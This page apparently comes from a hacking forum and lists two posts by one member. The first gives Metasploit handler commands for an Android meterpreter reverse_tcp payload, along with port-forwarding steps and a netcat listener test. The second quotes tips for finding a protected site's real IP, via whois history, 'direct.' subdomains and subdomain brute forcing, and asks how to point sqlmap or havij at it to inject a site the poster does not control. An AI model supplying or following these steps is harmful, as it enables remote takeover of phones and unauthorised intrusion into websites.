Jump to content

0o0michael0o0

Active Members
  • Posts

    13
  • Joined

  • Last visited

Posts posted by 0o0michael0o0

  1. use multi/handler

    set PAYLOAD android/meterpreter/reverse_tcp

    set LHOST xx.xx.xx.xx

    set LPORT 24000

    exploit -j

    make sure that u have the port 24000 open on your router and link it to ur internal ip address

    type in terminal nc -lvp 24000

    and check if ur port is open throw this site http://www.canyouseeme.org/

    if u get a connection from this site that means that all is good with u

    that shall work fine

    and if u want to use a dynamic dns

    https://community.rapid7.com/thread/4676

  2. If you can de-cloak the severs IP, or find it through other means such as whois archives or netcraft history, then you can point your hosts file at the real IP and then run your attacks. Doesn't mean the exploits work, which would still require a vulnerable version of SQL software and/or accepting unsanitized data input that you can manipulate. One of the quickest checks is replacing www.somesite.com with direct.somesite.com or direct-connect.somesite.com. These often expose the domains real IP, as well as brute forcing sub domains like mail.domain.com, or even ftp.domain.com

    thnx digip , actually the site is very well protected and i tried to enumrate the dns with more than methoud but i got a question , if i get the real ip of the server , how can i make the sqlmap or havij for example use the real ip ?? i know that if i get the user of the site , i can do it like that http://127.0.0.0/~/user/etc

    but what if i did`nt get the user of the site ? how can i inject the site after getting the real ip ? thnx in advance

×
×
  • Create New...